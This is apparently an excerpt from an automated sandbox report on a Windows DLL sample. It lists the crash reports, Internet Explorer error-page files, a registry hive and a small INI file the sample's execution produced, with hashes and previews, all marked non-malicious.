    SHA1: CEB5A7BBB7047E98DA6CB8839CEBCB3357362634
    SHA-256: 5DA4380985BDABF919DB6A255A1402464FA93F6D43CC8812C5D4ED265FC9AD0B
    SHA-512: 6C9C451ED3F01CDF66080E4EBAC59A62B12F1F24AB52F8640A5BD3E0A489202E5B755D6997D760303868F07AA65B5F2EDF4DE61ED717AE06E60972AB56B6B745
    Malicious: false
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4749
                              Entropy (8bit):4.44651433693268
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VYxYm8M4JCdP5XFfa+q8vjP5MGScSSd:uIjfUI7Jt7V9JmaK2J3Sd
                              MD5:94B01D1D1109DE3B8C459B46E066F801
                              SHA1:148393D7818CE3FF54D9A39B8F147CB2735DF770
                              SHA-256:3C5ABED929445F874B97A695ACB696CB6C13F615CA9F4A76217F94CC871240B4
                              SHA-512:A0578AE67849BF13CBC70242410F145D417B2543102CEE2532C3D97C1550A5662099568AB5095D47B46AE0878054FA444AD3F2149046EA634E6A4BBF6C11D296
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:13 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):48112
                              Entropy (8bit):2.767165652974777
                              Encrypted:false
                              SSDEEP:384:IYTrEBnx9veM7oWK5HzLOLdpjErNU5Qq5fOQNq274:I2sxFedWK5zLQnYi5mQNs
                              MD5:6918FD548CFA2110B147C9A22F58D269
                              SHA1:05C0F271C5CF824B29AECFC22B37478820728CBE
                              SHA-256:B8B7792BE963BCEE531810164EE7CC07A66A8899A25A4C85BFA31BF451D4F2A1
                              SHA-512:70AA7788CD2E67D6FCCED968A12B44FFE69C054717F39E50883F4DB48883A0CE5209E2A1909E6101ED446E96E6DB068680D9D52298BACFEF8DFFB821A5136762
                              Malicious:false
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8304
                              Entropy (8bit):3.6973514370621636
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJqU6OAvR6YyV69ggmfTqZpr089bbEsfiJm:R6lXJx6OW6Y469ggmfTq1b3fF
                              MD5:F45FDDE89D437A769528C9D88E2FC17D
                              SHA1:95A50D59D5A3C897AE8BDBAD4B24EF1CF376DCD0
                              SHA-256:EA8300CF758D198BFAFA5A15615E2D894DF2D442C8408913D41EB12C019BD56B
                              SHA-512:8B5CECA5D48046D6BDECC0A213058CEA6B2271293A2DDDA36450F33B6E12FA23C9CFEC81F7095038ABF7AFBE01A5F02E8A16117E09C85D48745C8D36B50A6685
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.9.2.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4658
                              Entropy (8bit):4.47726134873364
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VY9Ym8M4JCdP5uq1FXd+q8/LNEqs1GScSQd:uIjfUI7Jt7VlJWuqdcuqs1J3Qd
                              MD5:A6E678187126C167FE42EA7A7D7099B8
                              SHA1:26EFBCAE0B3298E09879EA707085BEDC9F97EB90
                              SHA-256:8D03CDD2DFABCB0C8738D10C5AC0A604CD1A8B89A323C435CCC0C89A3767C81A
                              SHA-512:2E197A1E2F6D983DF2B0E192BE33AC7A5CC54BB9DB25D7D258D27E7AD65E070E1F2324DEC0037D14759889675002EB3C223F72BB3E02F89B0C5BFE3F479FD4E5
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:16 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):43648
                              Entropy (8bit):2.787476200801324
                              Encrypted:false
                              SSDEEP:384:u8TrEBnx9veMk5HzLDp7ErNreeMwic3IZj:uKsxFe35zLlQ9MdcOj
                              MD5:AA582459C516BC8BDBC4F47F029E2260
                              SHA1:24B0774D3DE9A85299E21C08B525B73697FE19E5
                              SHA-256:D11F1F0FD140AB176DAE75B36EA9DF9D55F86D6DCD0623809BD77EE2B1B01B9C
                              SHA-512:4F53904BD522578A60B3CE861C924256206AB4B916EC488A854B13B11B42445779350D4648C812E8D2F83CF2D0C230DD442C357FA9895C57DB9E17466C2DA9F8
                              Malicious:false
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8304
                              Entropy (8bit):3.6968703464085775
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJqb6PEvR6YyJ69ggmfTW6hpDT89b2EsfpuSm:R6lXJO6q6Yk69ggmfTW6Q23fo
                              MD5:BC90C7FEE993D81D4697F07BCA7C2B90
                              SHA1:4DC599C0A116C063F352BDA1E949C93812DF68F2
                              SHA-256:5F3B3D20ACD1ED43E3ECBB8848DCADF2093E68E5EA3AB5A3FDF6041154976AAE
                              SHA-512:927AE04B9E3B16BE4ED5884D43EA567B038B2AF69AB41B9AEF6092849E2A92B1BF5EA03489D7A98157A0FD0537C6129717D99B7AD9BA11EBCFDA5B3A025DB740
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.9.2.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4658
                              Entropy (8bit):4.4752261499225225
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VYmYm8M4JCdP5Iq1FU+q8/LnEqs1GScSQd:uIjfUI7Jt7V6JWIqEcEqs1J3Qd
                              MD5:5C09CBCB58E270E8F1A9ADC524BEB7CD
                              SHA1:F361A2E13A776366B11F439D07B0DC3A57740851
                              SHA-256:F693F6E13CFCBBED71F420DE7413B8E194E1B5EDF03D4B413D9FB1DD436126F1
                              SHA-512:62FBBC6EEBF26F895243324EC50E62F862940373E7F8B13C98B43A273546C125E497B82E96665D9743B5AEFA5ED75030EB27F271D8CAD966FD290A8BDEBCAFF1
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:23 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):46240
                              Entropy (8bit):2.040508208045382
                              Encrypted:false
                              SSDEEP:192:SEJC8czkTXKaxypO5H4u3OnKXcm58e3UQ:FCAMs5H/+Yj5ZU
                              MD5:690672D8787385B5C3E774F41A345F54
                              SHA1:281DA3DF512F5AC4CD0426D422C36146254E43A9
                              SHA-256:58C375941F0F7AAA27DA01A1851F998D573218111BA384BCD049D1C37F1E5431
                              SHA-512:B8EFCD3780CE28FB5EE1B04AF352D3A11D781719E74EB26F1E53777F16C175D1E0787F870F2C36E37A1653D461D05EE34A661818BF350180B7DF9DAE98B3494F
                              Malicious:false
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8294
                              Entropy (8bit):3.695566885705297
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJqU6gyJfT6YyE69ggmfT/YXprT89b4p95sfuIm:R6lXJx6TJfT6YJ69ggmfT/Y+4p9Sf4
                              MD5:9B0BA687FED53791CD6D92C7B22D48CA
                              SHA1:983A6A80A1774D8E819C12BEC3224142B2E17EE4
                              SHA-256:7ADDDFCA6BA78B1330E0E9FB0719A058BA7D48BE62D5259D17E89437D071280F
                              SHA-512:2A2D4ECA72E07792B656E03D2979C4756208B7F33C997A54FBE3C01C87333A09322B5E9CD8A678B55E489C3CDF1A8CE49C8B4A53A5A56F86DF7C0679EF849584
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.2.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4648
                              Entropy (8bit):4.459729397780003
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zs1Jg77aI9n0WpW8VYKYm8M4JCdP5a6FFFOJ+q8/LOZsGScSbd:uIjfPI7Jt7VCJv+J3bd
                              MD5:6DE36B04E10EE5E37B276BB495D30511
                              SHA1:51CBC366005497A315C265CE679950CCD15B10F2
                              SHA-256:4C239A28F2A7AC874229D6893C5617DEA7CDC7AEE380B8508BFB6D3A559EC001
                              SHA-512:40875097E1AACC4E3E128CBB57C9EFD326502FE5ABFD4E95C028A2BD6606FA6B3F217806B9275A83CC763544E03DF1755C7F2AD10519E940B524AFA303F8D6D4
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677441" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:37:24 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):50516
                              Entropy (8bit):2.0315752546613277
                              Encrypted:false
                              SSDEEP:192:pGVswr9Z4jXL3GzO5H4O30naoYo5QcerZsyaw9WPpJh3G9yl:Va0P5HPknaQKcerZZaw9EJ9kg
                              MD5:3CE33067838E0D73EC5E48F06BC99894
                              SHA1:62DA4E96D3D146AB78CB7BA579E32F829820750D
                              SHA-256:0C37C079EA565982F05896329B4247D36BBDA51BBEF39A0A335805D1669C4EB4
                              SHA-512:D33C7D2912FB6EB4A6D58DA105549A2356790117D6B39E34E47EC8C64BEE5A48056D23FB4A312EAF77C0B67AAB70968D76BA1EA96B20BEDF5FDE93E06C7C3296
                              Malicious:false
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8322
                              Entropy (8bit):3.694986742148596
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJnMO6o6YCZ68gmfT/YXpre89bYYsfxQIm:R6lXJt6o6YE68gmfT/Y9YLf8
                              MD5:49854B6C8F99EEC298D93DABB08FADC7
                              SHA1:509B89395F431AFB826980F8A60E09FD91D5130D
                              SHA-256:78BDFB2576C8004C8BD604DFE9AE97F548B6973584137A507584D5873F105905
                              SHA-512:E4A6C05013612B19499E33D3EE359F5B14071071C98B71AE0374E992DC47E5B09B10D69640B0D3E99822CE5F96DEAB33D97E957FAD946591171298BD400A74A8
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.<./.P.i.d.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4648
                              Entropy (8bit):4.460434734525578
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VYXYm8M4JCdP5a6FbP+q8/LOZxGScSid:uIjfUI7Jt7VDJoPfJ3id
                              MD5:B7C483E964270609B150D125AD936FA6
                              SHA1:2CA5DFA1C51D91DFF3485B01FE91B4BDA6DBF6F0
                              SHA-256:8168D5E4D689B58E1FA9711B6A980610F72CD447F425FD189E0E23E85056CD1B
                              SHA-512:AC2A6148318DF9DAFDA7826FE149BB0202EA39A2B9D2AEE4DE301EE543A1820D9AA8826D27C73DEF6F4240FE10C6B89CE40889DE10F0997CB80B104376DBC7FA
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):32
                              Entropy (8bit):4.351409765557392
                              Encrypted:false
                              SSDEEP:3:1EypyREcuv:1XpyyTv
                              MD5:E7621EF73EF6B46018946DC34EE3653E
                              SHA1:33B9ACE89DA64A0F1E6D974BB76C454A5D639DF0
                              SHA-256:E455E140237A6A3F2B5D0A4C98C12BEA4DF98CCB2EEECB359BFAA41ABFE49546
                              SHA-512:07396ADCE8D19AA2358C0F5979F0E8BBE448496F556DDAD4C326EAF1D3EB182D0B901058B965904088BDD270CAC449E6A06145AEAAF2F80C36950066978E88A2
                              Malicious:false
                              Preview:[Generate Pasta]..mHazIynKcSqV..
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:modified
                              Size (bytes):4722
                              Entropy (8bit):5.16192639844512
                              Encrypted:false
                              SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g5O8b7A9I5:JsUOG1yNlX6ZzWpHOo/iP16CbM1k
                              MD5:387B4FC78ABB97F378C5299D4D2CE305
                              SHA1:6F2995FC620AB520C9EE1CA7244DF57367F983A2
                              SHA-256:030209A13E2C84118139ABF0C4F08DBD203B4C802C7B73B74851860D79DF9CB7
                              SHA-512:592D5E3FB7C78420F648281D87B0B303773749B8E0D3621A493ACAE257E2C1E77B782F3D6DAA0C2B3D37CBB4865B382617AF744E34F66C0F3E522DBCA7D71AAE
                              Malicious:false
                              Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1681
                              Entropy (8bit):4.567538112791388
                              Encrypted:false
                              SSDEEP:24:rC7cWhfs5mVM4mVMyIjmgAV28EFP8hRqh/k+CkE03vjqX:u7o5V4VtihV2lFUWlEqvj6
                              MD5:C74D57042D3614B92F2E0AF783ACD5DE
                              SHA1:415F8A0F5DBD61D622724034C182C0B15E80CD20
                              SHA-256:05182A8C3A558E671705B8A8421712A9715A1D597606E3710A6D6CFEB00FB462
                              SHA-512:F33BC2CDA990B07FE8EA37A1F68DDDBF5FA9A67CA028019EA4D848B70CC6410D1468E0CE8F8132665124F6E4B8438AFFC41FB562D9E4A1401498E46CD0D1A0EC
                              Malicious:false
                              Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1612
                              Entropy (8bit):4.869554560514657
                              Encrypted:false
                              SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                              MD5:DFEABDE84792228093A5A270352395B6
                              SHA1:E41258C9576721025926326F76063C2305586F76
                              SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                              SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                              Malicious:false
                              Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.469391073562723
                              Encrypted:false
                              SSDEEP:6144:TzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S:vZHtYZWOKnMM6bFpHj4
                              MD5:653775A6AAC073540F21A48771AE872B
                              SHA1:4F64945F1402DF0F6D2A0AB6FF723171921FFC43
                              SHA-256:032CC87B3C5FB6405A91AD09DAF7902F7F1374464AE11728001F661F6807AE10
                              SHA-512:99E1F5DDE9D3C24C3321684AEA4482D0E287CE6D918505A4FE45567DEFD53AC5D3FD32961B3E89362AAA9BEE5565A84E3E57BA1FBD77BA5996F7BA1E811EC574
                              Malicious:false
                              Preview:regfM...M....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....g..............................................................................................................................................................................................................................................................................................................................................(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.960944638650986
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
